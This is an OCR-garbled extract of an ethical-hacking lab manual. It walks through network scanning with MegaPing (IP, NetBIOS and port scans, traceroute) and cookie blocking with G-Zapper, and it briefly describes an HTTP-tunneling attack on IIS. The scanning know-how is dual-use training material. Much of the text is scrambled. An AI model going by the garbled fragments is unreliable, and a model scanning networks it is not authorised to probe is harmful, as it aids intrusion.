1. H o w d o y o u s e t u p a n H T T P o r t t o u s e a n e m a il c lie n t ( O u d o o k , M e s s e n g e r , e tc . ) ? 2. E x a m in e i f s o ft w a r e d o e s n o t a llo w e d it in g d ie a d d re s s t o c o n n e c t to .

In t e r n e t C o n n e c tio n 0 Y es S u p p o rte d

R e q u ir e d □ N o

P la tfo r m 0

C la s s r o o m

iL a b s

C E H Lab M anual Page 234

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

B asic N etw ork T roubleshooting Using M egaPing
MegaPing is an ultimate toolkit thatprovides complete essential utilitiesfor information system administrators a n d I T solutionproviders.
i con
/ / V a lu a b le in f o r m a t io n

k e y

L a b

S c e n a r io
t u n n e l i n g is a t e c h n i q u e w h e r e c a p tu re d u s in g th e H T T P

Y o u h a v e le a r n e d in th e p r e v io u s la b t h a t H T T P c o m m u n ic a tio n s w ith in n e tw o rk p r o t o c o ls a re

s

Test your k n o w le d g e

p r o t o c o l. F o r a n y c o m p a n ie s t o e x is t These w eb s e rv e rs p ro v e to be a

0 11 t h e I n t e r n e t , t h e y r e q u i r e a w e b s e r v e r .
h ig h d a ta v a lu e ta rg e t fo r a tta c k e rs . The a n d g a in s c o m m a n d l i n e e s ta b lis h e d , th e a tta c k e r th e lits

W e b e x e r c is e

a tt a c k e r u s u a lly e x p lo it s d ie W W W access to th e s y s te m . O nce a

s e rv e r r u n n in g IIS has been

c o n n e c tio n

m

W o r k b o o k r e v ie w

u p lo a d s a p r e c o m p ile d

v e r s io n o f th e

H T T P

t u n n e l s e r v e r ( lits ) . W i t h

s e r v e r s e t u p th e a tta c k e r th e n s ta rts a c lie n t tr a ffic lis te n s to th e SRC p o r t o f th e s y s te m

0 11 h is o r h e r s y s te m a n d d ir e c ts its
th e lit s s e rv e r. T h is tr a ffic . The lits lits p ro c e s s p ro c e s s

r u n n in g and

0 11 p o r t 8 0 o f t h e h o s t W W W
H T T P

r e d ir e c ts

c a p tu re s th e t r a f f ic in

h e a d e rs a n d fo rw a rd s it to

th e W W W

s e rv e r p o r t

8 0 , a f t e r w h i c h t h e a t t a c k e r t r ie s t o l o g i n t o t h e s y s t e m ; o n c e a c c e s s is g a in e d h e o r s h e s e ts u p a d d i t i o n a l t o o l s t o f u r t h e r e x p l o i t t h e n e t w o r k . M e g a P in g s e c u r ity s c a n n e r c h e c k s y o u r n e t w o r k f o r p o t e n t ia l v u ln e r a b ilit ie s t h a t m ig h t b e u s e d t o a tt a c k y o u r n e t w o r k , a n d s a v e s in f o r m a t io n i n s e c u r ity r e p o r t s .

1 1 1 th is

la b

you

w ill

le a r n

to

use

M e g a P in g

to

check

fo r

v u ln e r a b ilit ie s

and

t r o u b l e s h o o t is s u e s .

L a b

O b je c t iv e s

T h is la b g iv e s a n i n s ig h t i n t o p i n g in g t o a d e s t in a t io n a d d r e s s lis t . I t te a c h e s h o w to : ■ ■ ■ P in g a d e s tin a tio n a d d re s s lis t T ra c e ro u te P e rfo rm N e tB IO S s c a n n in g

C E H Lab M anual Page 235

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

L a b

E n v ir o n m e n t

T o c a n y o u t d ie la b , y o u n e e d : ■ M e g a P in g is lo c a t e d a t

C D Tools

D:\CEH-Tools\CEHv 8 M odule 03 S canning N e tw o rk s \S c a n n in g T ools\M egaP in g M egaping
fro m th e lin k

d em o nstrate d in th is lab are a va ila b le in D:\CEH• Tools\CEHv 8 M odule 03 S canning N e tw o rks

Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f h ttp : / / w w w .m a g n e to s o ft.c o m /

I f y o u d e c id e t o d o w n l o a d t h e i n th e la b m ig h t d if f e r

la te s t ve rs io n ,

th e n s c re e n s h o ts s h o w n

A d m in is t r a t iv e p r iv ile g e s t o r u n t o o ls s e t t i n g s c o r r e c d y c o n f i g u r e d a n d a n a c c e s s ib l e D N S la b e n v ir o n m e n t , o n s e rv e r

■ TCP/IP

T h is la b w i l l w o r k i n th e C E H

W in d o w s S e rve r

P IN G

sta n d s fo r

2012, W in d o w s 2008,
L a b D u r a t io n

and

W in d o w s 7

P a c k e t In te r n e t G ro p e r.

T im e : 1 0 M in u te s

O v e r v ie w

o f P in g

T h e p in g c o m m a n d s e n d s p a c k e ts t o d ie

In te rn e t C ontrol M essage P rotocol (ICMP)
fo r an

e c h o re q u e s t d iis re q u e s t-

ta r g e t h o s t a n d w a its

ICMP response.

D u r in g

re s p o n s e p ro c e s s , p in g m e a s u re s d ie tim e f r o m d ie

tr a n s m is s io n t o r e c e p tio n , k n o w n as

round-trip tim e ,
T a s k s
L a u n c h th e

a n d r e c o r d s a n y lo s s p a c k e ts .

L a b TASK 1
1.

S ta rt

m e n u b y h o v e r in g d ie m o u s e c u r s o r o n th e lo w e r - le ft

IP Scanning

c o r n e r o f th e d e s k to p .

F IG U R E 13.1: W in d o w s S e rv e r 2012 - D e s k to p v ie w

2.

C lic k d ie

M egaPing

a p p t o o p e n d ie

MegaPing

w in d o w .

C E H Lab M anual Page 236

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

F IG U R E 15.2: W in d o w s S e rv e r 2012 - A p p s

3.

TQ i^M e g aP ing ma!1^ n n d o w ^ ^ h o ^ M 1^ h ^ b l l o \ n n ^ 1 ‫־‬ g u 1^ ^ ^
55
File View Tools Hdp

MegaPing (Unregistered)

-

□ '

x

‫ד‬

Q Fngcr 1 S Network Time
gg Ping
C Q A ll S c a n n e rs c a n sca n in d iv id u a l c o m p u te rs , a n y ra n g e o f I P ad d re sse s, d o m a in s , a n d se le c te d ty p e o f c o m p u te rs in s id e d o m a in s ^
g g Traceroute

*

DNS Lookup Name

‫ &י־‬DNSLidrtosfe

Who 1 1 Network R#toufc#t

< < • >Process Info Systam Info £ IP Scanner $ NetBIOS Scanner • '4 ? Share Scanner ^ Security Scanner -J? Port Scanner Jit Host Monitor

*S Lbt Ho>ts
F ig u r e 15.3: M e g a P in g m a in w in d o w s

4.
S e c u r ity s c a n n e r p ro v id e s th e fo llo w in g in fo rm a tio n : N e t B IO S n a m e s, C o n fig u ra tio n in fo , o p e n T C P a n d U D P p o rts , T ra n s p o rts , S h a re s , U s e rs , G r o u p s , S e rv ic e s , D r iv e r s , L o c a l D r iv e s , S e s s io n s , R e m o te T im e o f D a te , P r in te r s

S e le c t a n y o n e o f d ie S e le c t

o p tio n s

fro m

d ie le f t p a n e o f d ie w in d o w . fie ld ; i n

5.

IP s c a n n e r,

a n d ty p e in th e

t h is la b t h e I P r a n g e is f r o m

IP range i n d i e From a n d To 1 0 . 0 . 0 .1 t o 10.0.0.254. C l i c k S ta rt

6.

Y o u c a n s e le c t t h e

IP range

d e p e n d in g o n y o u r n e t w o r k .

C E H Lab M anual Page 237

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

fs r
File V«‫*׳‬/ Took Help

MegaPing (Unregistered)

‫־‬

° r

^ 3‫^>׳‬
^<
_

v

^ e g

DNS List ‫״‬ !‫״‬U X .Hosts IWU

r

r « a

^

P - 1 'S W W

* t DNS Lookup Name ^ Finger Network Time 8a 8 Ping iraccroutc ^ Whois Network Resources <§> Process Info ^ System Info
t

I3 Scanner
Select I ► Scam•‫׳׳‬ “ I | 10

IP Sconncr SKtngj

0

0

1

10

0

0

254 | 1

SM

1

■*iiaui.111
■ £ NetBIOS Scanner
Y* Share Scanner

j & Security Scanncr ^ Port Scanner
^ Host Monitor

F IG U R E 15.4: M e g a P in g I P S c a n n in g

I t w i l l lis t d o w n a ll th e ( T im e t o L iv e ) , a n d a liv e h o s ts .

IP a d d re sse s

u n d e r d ia t ra n g e w it h th e ir

TTL

S ta tu s

(d e a d o r a liv e ) , a n d d ie

s ta tis tic s

o f th e d e a d

MegaPing (Unregistered)
Pie CD N e t w o r k u t ilit ie s : D N S lis t h o s t, D N S lo o k u p n a m e , N e tw o r k T im e S y n c h ro n i2 e r, P in g , T ra c e ro u te , W h o is , a n d F in g e r. View Tools Help

11 g
Q
a Finger

ft A < >
IP5i«nnw

i , DN: List Hosts ,p, DNS Lookup Name Network Time Traceroute HVhols 1 “ 5 Network Resources % rocess Info ^ System Info NetBIOS Scanner
y * Share Scanner

X

IP Scanner Setect. |R5rg‫־‬ »

$

IP Scanner Satnge

i t Ping

10 . 0

0 . 1

10

0

0

254 I

Start

F S ca re Status: ZoTDCTCC 25^ accroco33 m 15 8 C C S 3 A tte s t .=1 10.0.0.1 Name 1a0.04 iao.o.6 1ao.o.7 Tme 0 1 0 0 TTL 54 Statj* Afivc

o— l — Show MAC

A d d r e s s e s
H o s t sS t a t s
To!d. 254 Active 4 Faicd: 250

$

Security Sconner

g g £
£ ^

128 A kvt 128 A ive 128 Afcve D e lDest.. D « tDest — De«t._ Dest — Dest._ Rcpon

l. Jj? Port Scanner

JSi Host Monitor

1a0.0.10 j q 10.0.0.100 1CL0.0.I0I 10.0.0.102 iclo .o.io j 1a0.0.105

£ g

j l 10.0.0.1m

F IG U R E 15.5: M e g a P in g I P S c a n n in g R e p o r t

S

T A S K

2

8.

NetBIOS Scanning

NetB IO S S c a n n e r f r o m t h e l e f t p a n e a n d t y p e i n t h e I P r a n g e i n t h e From a n d To f i e l d s . 111 t h i s l a b , t h e IP ra n g e is f r o m 10.0.0.1 t o 1 0.0.0 .2 54 C l i c k S ta rt
S e le c t th e

C E H Lab M anual Page 238

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

W
File
rP- A J* | DNS List Hosts

f/egaPing (Unregistered)
View Tools Hdp

T IP I

,5 , DNS Lookup Name ‫ ס‬M egaPing can scan yo u r e n tire n e tw o rk and provide in fo rm a tio n such as open shared resources, open ports, se rvice s/drivers a c tiv e on th e co m p u te r, key re g is try en trie s, users and groups, tru s te d dom ains, p rin te rs, and more.
9.
g Finger

N c G C S Ssonrcr

3

Network Time
Traceroute

t S P1n9 « £ Whols

Network Resource < $ > Process Info System Info ^ IP Scanncr

i! \
Share Scanner ^ ^ Security Scanner Port Scanner Host Monitor

NetBIOS Scanner
F IG U R E 15.6: M e g a P in g N e t B IO S S c a n n in g

The

N etB IO S s c a n w a d a p te r a d d re sse s

i l l lis t a ll th e h o s ts w i t h t h e ir

N etB IO S nam es

and

MegaPing (Unregistered)
Me

V tf A

Tori?

Help

JL JL 4S & * “ 88 8&

& ‫ ־‬Scan results can be saved in HTML or TXT reports, w h ic h can be used to secure your n e tw o rk ■ ‫ ־‬fo r exam ple, by s h u ttin g dow n unnecessary ports, clo sin g shares, etc.

JJ, D N SL is tH o s ts j!LD N SL o o k u pN a m • QF in g e r !3 1N e tw o rkT im e
t i p,n9
g*3 Traceroute ^ Whole - O Network Resources % Process Info ‫״״‬J ^ System Info ^ IP Scanner

&
^

K«BIT$ Scarrer

N et90$ Scanrer

M e nBIOS Scarrra

|Rerg5 NstEtOS Scanner aJatLS‫־‬

] |1 0. 0 . 0 . 1 |

10

0 . 0 .254

Stop

Z o ro e e cQuemg NetBOS Names on
Name STctus WIN-ULY833KHQ.. A l* « 3 00 15-5D 00-07 . . Microsoft ‫״‬ WORKGROUP ADMIN• PC 6 Alive M<T0?cfr ‫״‬

‫י‬E x p a r d
1Names
Expand

$m ggnn1
4 jp Share Scanner Security Scanner
/ ‫״‬ y Port Scanner

100.0.4 » 2 ) NetBIOS Names

Summary

W gf Adopter Address
A □cmam

Sots Told. 131 Actvc 3

2 ( Host M unitur

iac.0.6
fr] NetBIOS Nome:

W B Adapter Addre«
4^ Domain 100.0.7

0 0 1 5 5 0 0 0 0 7 ‫־‬ ..

=a!od 123

WORKGROUP WIN-D39MRSHL.. A lv# 3 D4-BE-D9-C3-CE..
Report

» j | ] NetBIOS Names X f Adapter Address

NetBIOS Scanner

F IG U R E 15.7: M e g a P in g N e t B IO S S c a n n in g R e p o r t

10. R ig h t- c lic k th e I P

a d d r e s s . 111 t h i s l a b , t h e s e l e c t e d I P i s 1 0 . 0 . 0 . 4 ; i t w i l l

b e d iffe r e n t in y o u r n e tw o r k . 5

TAs K 3 T ra ce ro u te

1 1 . T h e n , r i g h t - c l i c k a n d s e le c t t h e

T ra c e ro u te

o p tio n .

C E H Lab M anual Page 239

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

v
File View Tools Hdp ^ ‫ם‬ O th e r fe a tu re s in c lu d e g 3 DNS List Hosts Finger Network Time $

MegaPing (Unregistered)

I

I

M

; j , DNS Lookup Name

NetBICS Scarre‫־‬

m u ltith re a d e d d e s ig n th a t a llo w s to p ro c e s s a n y n u m b e r o f re q u e s ts in a n y to o l a t th e sam e tim e , realtim e n e tw o rk c o n n e c tio n s s ta tu s a n d p ro to c o ls s ta tis tic s , re a l- tim e p ro c e s s in fo r m a tio n a n d u sag e, re a l- tim e n e tw o rk in fo rm a tio n , in c lu d in g n e tw o r k c o n n e c tio n s , a n d o p e n n e tw o rk file s , syste m tr a y s u p p o rt, a n d m o re

M *3 0 S Scarner Soeci: Range NetElOS S eine r
Satus

NetBIOS Scanner S9<tngs Rom: v | 10 0 0 0 254 Start

t®* Pin9 A Traceroute 4 $ Whois Network Resources ^ Process Info System Info

Carotored ? M addresses m M secs

•‫־‬ ^ IP Scanner ‫׳‬J ^ NetBIOS Scanner Share Scanner Security Scanner

_______ B 0 B ■
* D NetBIOS f■ AdapeerA A Comain - j j 10.0.0.5 i - J | NetBIOS S ? Adopter A ^ Comain B A £ 10.0.0.7 NetBIGS ‫ף‬

Names Nome Export To File Merge Hosts Open Share View Hotfix Detab Apply Hot Fixes Copy selected item Copy selected row Copy all result; Save As
3 0 ( jj

*

b ‫ ?׳‬Summary
Hoete Slate Total: 254 Active 3 Failed251 ‫־‬

Dcpand

^

Port Scanner

g l Host Monitor

■3 Adopter A

Traceroute
Tnccroutcs the selection

F IG U R E 15.8: M e g a P in g T ra c e ro u te

1 2 . I t w i l l o p e n th e s e le c t e d .

T ra c e ro u te

w in d o w , a n d w i l l tra c e d ie I P

a d d re s s

MegaPing (Unregistered)
Fie Vie■a Tools Help

S. JL 4$ 1 5 1*« 8 8
Jj, DNS List Ho>b J!L DNS Lookup Nam• Tracerout*

& T ools d em o nstrate d in th is lab are a va ila b le in D:\CEHTools\CEHv 8 M odule 03 S canning N e tw o rks

| J Finger i l l Network Time

** D e s tr e b o n : 1 0 5 0 .4
Ztestrawn \Jdrcs5 Jst

aa T r a c e r o u teS e tth o t
□ Resolve I4an‫־‬s

^ -O

Whois Network Resources Process Info System Info

■ ^

IP Scanner NetBIOS Scanner Security Scanner

□ Select A l
Add Ddctc

*jp Share Scannei ‫>׳‬ y Port Scanner hoo 9 > 91 ‫י‬ 1 m £ ‫ ־‬A ' * 4 1 1 Time 0 ‫ו‬ Name Dstafc WIN-ULY8S8KHUIP [1_ Complete. 10.0.0.4 ADMIN PC [10.0.0.6] 10.0.0.6 <»73/1210t44tf Complete. 08/23/12 IQ4SJ1 Repoit |

jtA Ho»t Monitor

F IG U R E 15.9: M e g a P in g T ra c e ro u te R e p o r t

S

TAs K 4

1 3 . S e le c t P o r t S c a n n e r f r o m

d ie l e f t p a n e a n d a d d th e

P ort Scanning

w w w .c e rtifie d h a c k e r.c o m 111 c l i c k t h e S ta rt b u t t o n .
14. A f t e r c lic k in g th e

D e s tin a tio n A d d re ss L is t

a n d th e n

S ta rt

b u t t o n i t to g g le s t o

S top

1 5 . I t w i l l lis t s t h e p o r t s a s s o c ia t e d w i t h w w w . c e r t i f i e d l 1 a c k e r . c o m w i t h d ie k e y w o r d , r is k , a n d p o r t n u m b e r .

C E H Lab M anual Page 240

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

MegaPing (Unregistered)
File View Tools Help &

‫ ך‬- ‫ז ״י‬

v ‫ן‬

A A £ G J 8s 8s <5 J ' b -jj, DNS List Hosts ,5, DNS Lookup Name
^ Finger

r

H

I

J

&

G O

J‫!׳‬
^ AotScamcr jftjf F01 Sc*1r*‫׳‬ PrttowlB Scan Type TCP an: UCP A/!h»1»S Pab
m m < ‫־‬ »V**tv30‫׳‬fl‫<»־׳‬ ‫׳‬n

M e g a P in g s e c u rity sc a n n e r c h e c k s y o u r n e tw o rk fo r p o te n tia l v u ln e ra b ilitie s th a t m ig h t u se to a tta c k y o u r n e tw o rk , a n d s a v e s in fo rm a tio n in s e c u rity re p o rts

54 Network Time f t Ping
g g Traceroute

^ Whois
Network Resources
-^ P ick m Info

1 1

S 1 0 0

Desindo^ A i^nt U a >

System Into
U IP Sc«nn«< ' f f NetBIOS Sc *nnei

□S * t* dA l w »!* |
2o r*

Share Seanner 4P S«cjntyScanner

Jjf

5 ‫ ז‬Monitor J f) , H0 =S 3 Ce2 fc

T > o e

Keyword

De a ctor

Scanning—(51 %) 99 Sccon ds Remain ‫ח‬g File Transfer [Control] TCP ftp TCP www-http World V.'1 de Web HTTP
UDP tcpmux TCP Port Servkc MultL. JOP compress.. Management Utility compten . CompreiMoo Proem

81

R*

,y 1 .* 2

.y ! .*5
j * ' ■

UDP JOP JOP UOP

rje echo ditcntd

Remote Job Entr> ‫׳‬ Echo Discard

Eksatcd Elevated Ele.xed L < * m Law Low Low Law

F IG U R E 15.10 : M e g a P iiig P o r t S c a n n in g R e p o r t

L a b

A n a ly s is

D o c u m e n t a ll d ie I P a d d re s s e s , o p e n p o r t s a n d r u n n i n g a p p lic a t io n s , a n d p r o t o c o ls y o u d i s c o v e r e d d u r i n g d i e la b .

T o o l/U tility

In f o r m a tio n IP

C o lle c t e d / O b je c t iv e s A c h ie v e d 1 0 .0 .0 .1 — 1 0 .0 .0 . 2 5 4

S can R ange:

P e r fo r m e d A c tio n s : ■ ■ ■ M e g a P in g ■ R e s u lt: ■ ■ ■ L is t o f A c tiv e H o s t N e tB io s N a m e A d a p te r N a m e P o r t S c a n n in g I P S c a n n in g N e tB IO S S c a n n in g

T ra c e ro u te

C E H Lab M anual Page 241

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R T O T H I S

I F

Y O U

H A V E

Q U E S T I O N S

R E L A T E D

L A B .

Q u e s t io n s
1. 2. H o w d o e s M e g a P in g d e te c t s e c u r it y v u ln e r a b ilit ie s o n d ie n e t w o r k ? E x a m in e t h e r e p o r t g e n e r a t io n o f M e g a P in g .

In t e r n e t C o n n e c tio n R e q u ir e d □ Y es S u p p o rte d 0 iL a b s 0 N o

P la tfo r m 0

C la s s r o o m

C E H Lab M anual Page 242

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

L ab

D e te c t, D elete a n d B lock G oogle C o o k ies U sing G -Z apper
G-Zapper is a utility to block Goog/e cookies, dean Google cookies, a n d help yon stay anonymous while searching online. I CON
V a lu a b le in f o r m a t io n

KEY

L a b
Y o u your

S c e n a r io
have le a r n e d fo r in d ie p r e v io u s la b d ia t M e g a P in g th a t m ig h t s e c u r ity be used It scanner checks to a tta c k your

n e tw o rk and

p o t e n t ia l v u ln e r a b ilit ie s in fo r m a t io n in

Test your k n o w le d g e

n e tw o rk ,

saves

s e c u r ity

re p o rts .

p r o v id e s

d e ta ile d

in fo r m a t io n

a b o u t a ll c o m p u t e r s

a n d n e tw o rk

a p p lia n c e s . I t

s c a n s y o u r e n tir e

m .

W e b e x e r c is e

n e t w o r k a n d p r o v id e s in f o r m a t io n s e r v ic e s / d r iv e r s a c tiv e

s u c h as o p e n

s h a re d re s o u rc e s , o p e n p o rts ,

0 11 t h e c o m p u t e r , k e y r e g i s t r y e n t r i e s , u s e r s a n d g r o u p s ,
S can r e s u lts can be saved in H T M L o r T X T

o

W o r k b o o k r e v ie w

tru s te d

d o m a in s , p r in t e r s , e tc .

re p o r ts , w h ic h c a n b e u s e d t o s e c u re y o u r n e tw o r k . A s an a d m in is tr a to r , p o rts , you can o r g a n iz e to s a fe ty b lo c k m e a s u re s a tta c k e rs by fro m s h u ttin g dow n th e

u n n e c e s s a ry

c lo s in g

s h a re s , e tc .

in tr u d in g

n e t w o r k . A s a n o th e r a s p e c t o f p r e v e n t io n y o u c a n u s e G - Z a p p e r , w h ic h b lo c k s G o o g le c o o k ie s , c le a n s G o o g le c o o k ie s , a n d h e lp s y o u s ta y a n o n y m o u s w h ile

s e a r c h in g o n lin e . T h is w a y y o u c a n p r o t e c t y o u r id e n t i t y a n d s e a rc h h is t o r y .

L a b

O b je c t iv e s

T h is la b e x p la in h o w G - Z a p p e r a u t o m a t ic a lly c o o k ie e a c h t im e y o u u s e y o u r w e b b r o w s e r .

d e te c ts

and

c le a n s

th e G o o g le

L a b

E n v ir o n m e n t

T o c a r r y o u t th e la b , y o u n e e d :

C E H Lab M anual Page 243

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

G - Z a p p e r is lo c a t e d a t

S ’ Tools dem onstrate d in th is lab are available in D:\CEHTools\CEHv 8 M odule 03 Scanning N etw orks

D:\CEH-Tools\CEHv 8 M odule 03 S canning N e tw o rk s \A n o n ym ize rs\G -Z a p p e r G‫־‬Z a p p e r
fro m th e lin k

Y o u c a n a ls o d o w n l o a d d i e la t e s t v e r s io n o f lit t p : / / w w w . d u m m y s o ftw a re .c o m / I f y o u d e c id e t o d o w n l o a d t h e i n th e la b m ig h t d i f f e r In s ta ll

la te s t v e rs io n ,

th e n s c re e n s h o ts s h o w n

G -Z apper

in W in d o w s S e r v e r 2 0 1 2 b y f o llo w in g w iz a r d d r iv e n

in s t a lla t io n s te p s A d m in is t r a t iv e p r iv ile g e s t o r u n t o o ls A c o m p u te r r u n n in g

W in d o w s S e rv e r 2012

L a b

D u r a t io n

T im e : 1 0 M in u te s

O v e r v ie w

o f G - Z a p p e r

G - Z a p p e r h e lp s p r o t e c t y o u r i d e n t i t y a n d s e a r c h h is t o r y . G - Z a p p e r w i l l r e a d d i e

lo n g

Google co o k ie i n s t a l l e d o n y o u r searches h a v e
you to

y o u r P C , d is p la y d ie d a te i t w a s in s t a lle d , d e t e r m in e h o w been

tra cke d ,

and

d isp la y

y o u r G o o g le

s e a rc h e s . G s e a rc h

Z a p p e r a llo w s c o o k ie f r o m

a u to m a tic a lly

de le te

o r e n tir e ly

b lo c k

d ie

G o o g le

f u t u r e in s t a lla t io n .

L a b
S

T a s k s
L a u n c h th e

t ask

1

1.

S ta rt

m e n u b y h o v e r in g d ie m o u s e c u r s o r o n th e lo w e r - le f t

D e te ct & D elete Google Cookies

c o m e r o f t h e d e s k t o p . _____________________________________________________

! 3 Windows Serve! 2012
* ttcua Stfwr JOtJ ReleaseCmadtte Oatacert* ftabslanuwy. 1uMM>:

F IG U R E 16.1: W in d o w s S e rv e r 2012 - D e s k to p v ie w

2.

C lic k d ie

G-Zapper a p p

t o o p e n d ie

G‫־‬Z apper

w in d o w .

C E H Lab M anual Page 244

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

S ta rt

Administrator £

Server Manager

Wruiows PowerShel

6 0 0 9 * Chrome
#
HyperV Virtual M«tww

Wjpw-V t/dru^e-

fLm Computer

V
Control Pwl

Ancrym.. Surfog Tutonal

G-Zapper

1 1
SOL S e n a

m

G - Z a p p e r xs

*J

w
Command Prompt

Q
M v ii l.retox

c o m p a tib le w ith W in d o w s 9 5 ,9 8 , M E , N T , 2 0 0 0 , X P , V is ta , W in d o w s 7.
'-x-olglan

n

$
NetSca'iT... Pro Demo

5 1
Standard

Maw

r*

1 1
F IG U R E 162 : W in d o w s S e rv e r 2012 - A p p s

3.

The

G -Zapper

m a in w i n d o w w i l l a p p e a r a s s h o w n i n th e f o l l o w i n g

s c re e n s h o t.

G-Zapper ‫ ־‬TRIAL VERSION
W h a t is G -Zapper G-Zapper - Protecting y o u Se arch Privacy Did you know •Google stores a unique identifier in a cookie on your PC , vrfich alo w s them to track the keywords you search fo r G-Zapper w i autom atically d etect and clean this cookie in your w eb browser. Ju s t run G-Zapper, m rw nee the w ndow , and en!oy your enhanced search privacy

2 ' I A Google Tracking ID oasts on your PC.
Your G oogle ID (Chrome) 6b4b4d9fe5c60cc1 Google n sta le d the co okie on W ednesday. Septem ber 05.2012 01 54 46 AM Your searches h ave been tracked for 13 hours

L J G - Z a p p e r h e lp s p ro te c t y o u r id e n tity a n d s e a rc h h is to ry . G - Z a p p e r w ill re a d th e G o o g le c o o k ie in s ta lle d o n y o u r P C , d is p la y th e d a te it w a s in s ta lle d , d e te rm in e h o w lo n g y o u r s e a rch e s h a v e b e e n tra c k e d , a n d d is p la y y o u r G o o g le se a rch e s

«>| No Google searches found n Internet Explorer or Frefox

How to U se It

«

To delete the G oogle cookie, d c k the D elete Cookie button Your identity w i be obscured from previous searches and G-Zapper w i re g Ja rly d e an future cookies. T 0 restore the Google search cookie d ick the Restore Cookie button

htto //www dummvsoftwar e. com

D elete Cookie

Resto re Cookie

T est Google

Settings

Register

F IG U R E 16.3: G - Z a p p e r m a in w in d o w s

4.

T o d e le t e t h e G o o g le s e a r c h c o o k ie s , c l i c k t h e

D e le te C o o kie

b u tto n ; a

w i n d o w w i l l a p p e a r t h a t g iv e s i n f o r m a t i o n a b o u t t h e d e le t e d c o o k ie lo c a t io n . C lic k

OK

C E H Lab M anual Page 245

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

‫י‬
W h at is G-Zapper

G-Zapper - TRIAL VERSION

■ ]j l F

x

‫י‬

G-Zapper ‫ ־‬Pro tectn g your S e arch Privacy

■#
C ] A n e w c o o k ie w ill b e g e n e ra te d u p o n y o u r n e x t v is it to G o o g le , b re a k in g th e c h a in th a t re la te s y o u r se a rch e s. Howt

Did you know ■Google stores a unique identifier n a cookie on y o u P C , v*»ch alo w s them 10 track the keywords you search for G-Zapper w i autom atically defect and d e an this co okie in your w eb browser. _.lm tJun_G 7an nftj the, w ndnw * in i ftninu.unui ^ n h ao cad joauacu_______ _______

G‫־‬Zapper

©

The Google search cookie was removed and will be re-created with a new ID upon visiting www.google.com The cookie was located a t (Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite

OK

T 0 block and delete the G oogle search cookie, click the B lo ck Cookie button (Gm ail and A dsense w i be u n avaJab le with the cookie blocked)

http //www. dumm vsoftware com

Delete Cookie

Block Cookie

T e st Google

Settings

Register

F IG U R E 1 6 .4 : D e le tin g s e a rc h c o o k ie s

5.

T o b lo c k th e G o o g le s e a rc h c o o k ie , c lic k d ie

B lo c k c o o k ie

b u tto n . A

w i n d o w w i l l a p p e a r a s k in g i f y o u w a n t t o m a n u a lly b lo c k th e G o o g le c o o k ie . C l i c k

Yes
G‫־‬Zapper ■TRIAL VERSION '- m

W h a t is G -Zapper G-Zapper - Pro tectn g y o u Se arch Privacy

‫ ס‬T he tin y tra y icon runs in th e background, ta k e s up very little space and can n o tify you by sound & a nim ate w hen th e Google c o o k ie is blocked.
How

Did you know - G oogle stores a unique identifier in a cookie on your P C . w hich alo w s them to track the keywords you search for. G-Zapper will autom atically d etect and d e an this cookie in y o u w eb browser.
p____ .L M

iijn fi- Z a n rre t m rnnnre the, w nrinw and pjiinu .unu..ftnhanrari sftatnh nrtvara_________ _______

Manually Blocking the Google Cookie
Gmail and other Google services will be unavailable while th e cookie is manually blocked. If you use these services, we recom m end not blocking the cookie and instead allow G-Zapper to regularly clean th e cookie automatically. Are you sure you wish to manually block the Google cookie?

Yes
T 0 block and delete the Google search cookie, click the Blo ck Cookie bU ton (Gm ail and A dsense w l be unavaiaW e with the cookie blocked)

No

http //www dummvsoftware, com

Delete Cookie

Block Cookie

T est Google

Settings

Register

F IG U R E 1 6 .5 : B lo c k G o o g le c o o k ie

6.

I t w i l l s h o w a m e s s a g e d i a t th e G o o g le c o o k ie h a s b e e n b lo c k e d . T o v e r if y , c lic k

OK
E th ic a l H ackin g and Counterm easures Copyright O by EC-Coundl A ll Rights Reserved. Reproduction is Strictly Prohibited

C E H Lab M anual Page 246

M o d u le 0 3 - S c a n n in g N e tw o rk s

G‫־‬Zapper -TRIAL VERSION
W h a t is G-Zapper G-Zappef - Protechng your Se arch Privacy Did you know ■G oogle stores a unique kfentifiet in a cookie on your P C . w hich alo w s them to track the keywords you search for G-Zapper will autom atically d etect and d e a n this cookie n y o u w eb browser. Ju s t run G-Zapper, mmmize the w rxlo w , and enjoy your enhanced search privacy

1 ^ 0

G‫־‬Zapper
The Google cookie has been blocked. You may now search anonymously on google.com. Click the Test Google button to verify.

H ow t

OK

Your identity will be obscured from previous searches and G-Zapper w i regularly clean M u re cookies

T0 restore the Google search cookie c lc k the Restore Cookie button

